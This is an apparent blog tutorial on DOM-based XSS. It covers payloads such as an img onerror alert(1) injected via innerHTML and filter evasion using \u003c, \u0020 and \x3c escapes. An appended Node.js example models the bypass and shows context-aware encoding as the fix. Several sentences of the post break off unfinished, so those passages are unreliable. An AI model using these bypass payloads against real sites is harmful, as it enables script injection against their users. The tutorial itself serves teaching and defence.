Dom Based XSS – Introduction

Introduction to DOM based XSS:
There is no point writing the same introduction again when it can be read from existing online material, so this post goes straight to discovery and exploitation.

Discovering and Exploiting:
1) Before learning DOM Based XSS, you need a few basics of HTML and JS. A value written into an element with innerHTML is parsed as HTML, not shown as text:

<div id="name">hello</div>
<script>
document.getElementById("name").innerHTML="aaaaa";
</script>


2) The string aaaaa can be replaced as follows:

<div id="name">hello</div>
<script>
document.getElementById("name").innerHTML="<img src=1 onerror=alert(1)>";
</script>



3) This time it resulted in a pop-up of 1, but that will not work every time:
Characters in a JavaScript string can be written as Unicode escapes. So < can be written as \u003c and > can be written as \u003e; the JS parser turns them back into the real characters before the string is used. Any online tool can do this conversion.

<div id="name">hello</div>
<script>
document.getElementById("name").innerHTML="\u003cimg src=1 onerror=alert(1)\u003e";
</script>


4) This all seems ridiculous right now, but it will help in the later explanation.

5) Let's analyze it through an example.
Relevant source code view (snippet):
<strong id="titlename">Searched by brand:aaaaaaa</strong></div>
<script>
if ("brand 1" == "category 1") document.getElementById("titlename").innerHTML="Search:aaaaaaa";
if ("brand 1" == "category 2")
if ("brand 1" == "category 3")
</script>

6) Inside the JS string, we know that < and > are filtered, so how do we approach it?
Let's see.
Note: we are dealing with situations where the user input lands inside the JS string literal that is assigned to innerHTML.
if ("brand 1" == "category 1")
\u003cimg src=1 onerror=alert(1)\u003e";
This will result in a pop-up of 1.

This is not where it ends: what if the space is filtered out as well? Let's see the payload:
if ("brand 1" == "category 1")
"Search: \u003cimg\u0020src=1\u0020onerror=alert(1)\u003e";

This could also result in a pop-up of 1, but again the filter comes into action: if \u003c and \u003e are filtered out, they get converted to &lt; and &gt;.
Now what?
Check whether only \u003c is filtered, or both \u0020 and \u003c. If only \u003c is filtered out, we learn that the filter matches specific keywords rather than the characters they decode to.
There are other ways to write the same characters: < can also be written as \x3c and > as \x3e.

7) The final URL becomes:
So, finally, this pops up.
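The scenario of steps 2 to 6 modelled end to end, as an added example that is not part of the original post and not code from the site it analyses: a filter that only strips literal < and >, the JavaScript parser decoding \uXXXX and \xXX escapes before the value reaches innerHTML, and the context-aware encoding (HTML-encode first, then JS-string-encode) that keeps the data as text. The renderScript() model of the page's template, the decodeJsStringEscapes() model of the parser, and all other function names are assumptions of this example; it runs under Node.js without a DOM.

```javascript
// Added example (not from the original post). Models the scenario above:
// user data lands inside a double-quoted JS string literal that is assigned
// to innerHTML. Runs under Node.js; no DOM is needed because the interesting
// step, the JS parser decoding the literal, is modelled by
// decodeJsStringEscapes(). All function names here are this example's own.

// Model of the vulnerable server-side template seen in step 5 (assumed shape).
function renderScript(brand) {
  return 'document.getElementById("titlename").innerHTML="Search:' + brand + '";';
}

// The filter the post runs into: only literal "<" and ">" are removed,
// which is useless here because the data sits in a JS string-literal context.
function naiveLtGtFilter(s) {
  return s.replace(/[<>]/g, '');
}

// What the browser's JS parser does with \uXXXX and \xXX escapes inside a
// string literal, before the resulting value ever reaches innerHTML.
// (Model only: the real parser understands more escape forms than these two.)
function decodeJsStringEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Detection-style check on the value that actually reaches the sink:
// does it open an HTML tag?
function containsTag(value) {
  return /<[a-zA-Z!\/]/.test(value);
}

// Correct encoding for a JS string-literal context: every UTF-16 unit outside
// [A-Za-z0-9] becomes \uXXXX (surrogate halves are encoded separately, which
// JS accepts), so the data can neither end the literal nor smuggle in
// escapes of its own (a backslash in the input becomes \u005c).
function escapeForJsString(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : '\\u' + s.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// HTML entity encoding, needed because the sink (innerHTML) parses HTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Encode for each context in the reverse order of decoding: the browser
// decodes the JS literal first and innerHTML parses HTML second, so
// HTML-encode first, then JS-string-encode the result. (The better fix is
// to assign textContent instead of innerHTML, which needs no HTML layer.)
function encodeForInnerHtmlViaJsString(s) {
  return escapeForJsString(escapeHtml(s));
}

// Walk the post's scenario end to end and report what reaches the sink.
function demo() {
  // Constructed sample, the same payload the post uses.
  const escapedPayload = '\\u003cimg src=1 onerror=alert(1)\\u003e';
  const rawPayload = '<img src=1 onerror=alert(1)>';

  const filtered = naiveLtGtFilter(escapedPayload);   // filter sees no < or >
  const naiveSink = decodeJsStringEscapes(filtered);  // parser restores them
  const hardenedRaw = decodeJsStringEscapes(encodeForInnerHtmlViaJsString(rawPayload));
  const hardenedEsc = decodeJsStringEscapes(encodeForInnerHtmlViaJsString(escapedPayload));

  return {
    emittedScript: renderScript(filtered),
    filterChangedNothing: filtered === escapedPayload,   // true
    naiveSinkValue: naiveSink,            // "<img src=1 onerror=alert(1)>"
    naiveSinkIsTag: containsTag(naiveSink),              // true
    hardenedSinkValue: hardenedRaw,       // "&lt;img src=1 onerror=alert(1)&gt;"
    hardenedSinkIsTag: containsTag(hardenedRaw),         // false
    hardenedKeepsEscapesAsText: hardenedEsc === escapedPayload, // true
  };
}

console.log(demo());
```

The point the run makes: the filter and the parser disagree about what a "<" is, so any check that runs before the JS parser must reason about the literal's decoded value, or the data must be encoded for the literal context so the parser has nothing to decode. Swapping innerHTML for textContent removes the HTML layer entirely and is the smaller change to make on a page like the one analysed above.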

This covers the following DOM XSS types:

There are some sites that use third-party JS libraries, such as jQuery; there will be

Finally, of course, we also need to mention some caveats.


One thought on “Dom Based XSS – Introduction”

  1. Good explanation, but could have dealt more at tool level and some practical scenarios which include other potential areas such as vulnerable JS methods etc.

